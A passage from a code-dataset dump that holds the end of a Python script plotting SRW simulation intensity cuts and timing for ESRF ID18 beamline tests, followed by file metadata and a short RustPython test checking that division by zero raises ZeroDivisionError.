image.LineStyle = 'o-' image.label = 'full image' image.Scale = 2 image.ax_limits = [0.5, 200000, None, None] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=False) image = b4pt.Image2Plot(err_rms_x, samples) image.LaTex = True image.grid = True image.legends = ['', '(macro-electrons)', 'std. dev. ($\%$)'] image.FontsSizeScale = 1.1 image.ColorScheme = 2 image.LineStyle = 'x-' image.label = 'ver. cut at $x = 0$' image.Scale = 2 image.ax_limits = [0.5, 200000, None, None] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) image = b4pt.Image2Plot(err_rms_y, samples) image.LaTex = True image.grid = True image.legends = ['', '(macro-electrons)', 'std. dev. ($\%$)'] image.FontsSizeScale = 1.1 image.ColorScheme = 3 image.label = 'hor. cut at $y = 0$' image.LineStyle = '^-' image.Scale = 2 image.ax_limits = [0.5, 200000, None, None] image.sort_class() b4pt.plot_1D(image, 'id18_c03_7p0keV_errs.pdf', Enable=True, Hold=True) def plts_time(): samples = np.asarray([100, 500, 1000, 2000, 5000, 10000, 25000, 100000]) t_c1 = np.asarray([1.33333, 5, 9, 15, 39, 1*60+20, 3*60+21, 13*60+15])/60 t_c2 = np.asarray([2.5, 9, 17, 30, 1*60+15, 2*60+35, 6*60+30, 4*(6*60+30)])/60 image = b4pt.Image2Plot(t_c1-100, samples) image.LaTex = True image.grid = True image.legends = ['', '(macro-electrons)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 0 image.LineStyle = 'o-' image.label = 'case 1' image.Scale = 2 image.ax_limits = [50, 200000, -1, 28] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=False) image = b4pt.Image2Plot(t_c1, samples) image.LaTex = True image.grid = True image.legends = ['', '(macro-electrons)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 0 image.LineStyle = 'o-' image.Scale = 2 image.ax_limits = [50, 200000, -1, 28] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) image = b4pt.Image2Plot(t_c2, samples) image.LaTex = True image.grid = True image.legends = ['', '(macro-electrons)', '(h)'] image.FontsSizeScale = 1.1 image.ColorScheme = 2 image.LineStyle = '^-' image.label = 'case 3' image.Scale = 2 image.ax_limits = [50, 200000, -1, 28] image.sort_class() b4pt.plot_1D(image, 'srw_time.pdf', Enable=True, Hold=True) def plts_1dy(): file_name = './me_tests/id18_c01_7.0keV_0p001k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) I = np.amax(cstx) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 101 image.LineStyle = '-' image.label = '1' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=False) file_name = './me_tests/id18_c01_7.0keV_0p010k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 103 image.LineStyle = '-' image.label = '10' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_0p050k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 105 image.LineStyle = '-' image.label = '50' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_0p100k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 107 image.LineStyle = '-' image.label = '100' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_0p500k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 109 image.LineStyle = '-' image.label = '500' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_1k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 111 image.LineStyle = '-' image.label = '1k' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_2k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 113 image.LineStyle = '-' image.label = '2k' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_5k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 115 image.LineStyle = '-' image.label = '5k' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_10k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 117 image.LineStyle = '-' image.label = '10k' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_25k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 119 image.LineStyle = '-' image.label = '25k' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_100k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = -1 image.LineStyle = '-' image.label = '100k' image.LabelPos = 1 image.ax_limits = [-25, 25, -0.02, 0.8] image.sort_class() b4pt.plot_1D(image, 'id18_c01_7p0keV_y_cut.pdf', Enable=False, Hold=True) # ------------------------------------------------------------------------------------------------------------------ file_name = './me_tests/id18_c03_7.0keV_0p001k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) I = np.amax(cstx) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 101 image.LineStyle = '-' image.label = '1' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=False) file_name = './me_tests/id18_c03_7.0keV_0p010k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 103 image.LineStyle = '-' image.label = '10' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_0p050k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 105 image.LineStyle = '-' image.label = '50' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_0p100k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 107 image.LineStyle = '-' image.label = '100' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_0p500k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 109 image.LineStyle = '-' image.label = '500' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_1k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 111 image.LineStyle = '-' image.label = '1k' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_2k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 113 image.LineStyle = '-' image.label = '2k' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_5k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 115 image.LineStyle = '-' image.label = '5k' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_10k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 117 image.LineStyle = '-' image.label = '10k' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_25k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 119 image.LineStyle = '-' image.label = '25k' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_100k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, 0, ':') image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = -1 image.LineStyle = '-' image.label = '100k' image.LabelPos = 1 image.ax_limits = [-25, 25, -0.02, 0.5] image.sort_class() b4pt.plot_1D(image, 'id18_c03_7p0keV_y_cut.pdf', Enable=True, Hold=True) def plts_1dx(): file_name = './me_tests/id18_c01_7.0keV_0p001k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) I = np.amax(cstx) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 101 image.LineStyle = '-' image.label = '1' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=False) file_name = './me_tests/id18_c01_7.0keV_0p010k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 103 image.LineStyle = '-' image.label = '10' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_0p050k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 105 image.LineStyle = '-' image.label = '50' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_0p100k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 107 image.LineStyle = '-' image.label = '100' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_0p500k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 109 image.LineStyle = '-' image.label = '500' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_1k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 111 image.LineStyle = '-' image.label = '1k' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_2k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 113 image.LineStyle = '-' image.label = '2k' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_5k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 115 image.LineStyle = '-' image.label = '5k' image.LabelPos = 1 image.ax_limits = [-40, 40, None, None] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_10k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 117 image.LineStyle = '-' image.label = '10k' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_25k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 119 image.LineStyle = '-' image.label = '25k' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 0.8] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c01_7.0keV_100k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = -1 image.LineStyle = '-' image.label = '100k' image.LabelPos = 1 image.ax_limits = [-35, 35, -0.02, 0.8] image.sort_class() b4pt.plot_1D(image, 'id18_c01_7.0keV_x_cut.pdf', Enable=False, Hold=True) # ------------------------------------------------------------------------------------------------------------------ file_name = './me_tests/id18_c03_7.0keV_0p001k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) I = np.amax(cstx) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 101 image.LineStyle = '-' image.label = '1' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=False) file_name = './me_tests/id18_c03_7.0keV_0p010k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 103 image.LineStyle = '-' image.label = '10' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_0p050k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 105 image.LineStyle = '-' image.label = '50' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_0p100k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 107 image.LineStyle = '-' image.label = '100' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_0p500k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 109 image.LineStyle = '-' image.label = '500' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_1k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 111 image.LineStyle = '-' image.label = '1k' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_2k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 113 image.LineStyle = '-' image.label = '2k' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_5k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 115 image.LineStyle = '-' image.label = '5k' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_10k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 117 image.LineStyle = '-' image.label = '10k' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 1.05] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_25k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 119 image.LineStyle = '-' image.label = '25k' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 0.5] image.sort_class() b4pt.plot_1D(image, 'id18_c03_7.0keV_x_cut.pdf', Enable=False, Hold=True) file_name = './me_tests/id18_c03_7.0keV_100k_ME_intensity.dat' print(file_name) cstx, x, y, mesh, Imax = read_srw_intensity_dat(file_name, norm=False) cuty, axisy = get_slice(cstx/I, x, y, ':',0) image = b4pt.Image2Plot(cuty, axisy*1e6) image.LaTex = True image.grid = True image.legends = ['', '($\mu$m)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = -1 image.LineStyle = '-' image.label = '100k' image.LabelPos = 1 image.ax_limits = [-75, 75, -0.02, 0.5] image.sort_class() b4pt.plot_1D(image, 'id18_c03_7.0keV_x_cut.pdf', Enable=True, Hold=True) if __name__ == '__main__': # # plts_analysis_c1() # plts_analysis_c3() plts_time() # plts_1dy() # plts_1dx()

34.357209

120

0.621758

5,537

36,934

3.951418

0.036843

0.049728

0.034188

0.047763

0.959139

0.957676

0.955757

0.953197

0.951643

0.946341

0

0.073796

0.210808

36,934

1,074

121

34.389199

0.676822

0.010478

0

0.905109

0

0.131853

0.096269

0

1

0.008342

false

0

0.005214

0

0.016684

0.047967

0

null

0

1

0

1

0

null

0

7

d92419d79f21c6f6c95af3c04843ae591ebe88b0

905

py

Python

tests/snippets/division_by_zero.py

nficca/RustPython

ac370260108f961af41c36afc200a8de954f59b6

[ "MIT" ]

null

tests/snippets/division_by_zero.py

nficca/RustPython

ac370260108f961af41c36afc200a8de954f59b6

[ "MIT" ]

null

tests/snippets/division_by_zero.py

nficca/RustPython

ac370260108f961af41c36afc200a8de954f59b6

[ "MIT" ]

null

try: 5 / 0 except ZeroDivisionError: pass else: assert False, 'Expected ZeroDivisionError' try: 5 / -0.0 except ZeroDivisionError: pass else: assert False, 'Expected ZeroDivisionError' try: 5 / (2-2) except ZeroDivisionError: pass else: assert False, 'Expected ZeroDivisionError' try: 5 % 0 except ZeroDivisionError: pass else: assert False, 'Expected ZeroDivisionError' try: 5 // 0 except ZeroDivisionError: pass else: assert False, 'Expected ZeroDivisionError' try: 5.3 // (-0.0) except ZeroDivisionError: pass else: assert False, 'Expected ZeroDivisionError' try: divmod(5, 0) except ZeroDivisionError: pass else: assert False, 'Expected ZeroDivisionError' try: raise ZeroDivisionError('Is an ArithmeticError subclass?') except ArithmeticError: pass else: assert False, 'Expected ZeroDivisionError'

16.160714

62

0.697238

97

905

6.505155

0.185567

0.101426

0.177496

0.240887

0.874802

0.805071

0

0.025532

0.220994

905

55

63

16.454545

0.869504

0

0.8125

0

0.264088

0

0.166667

1

0

true

0.166667

0
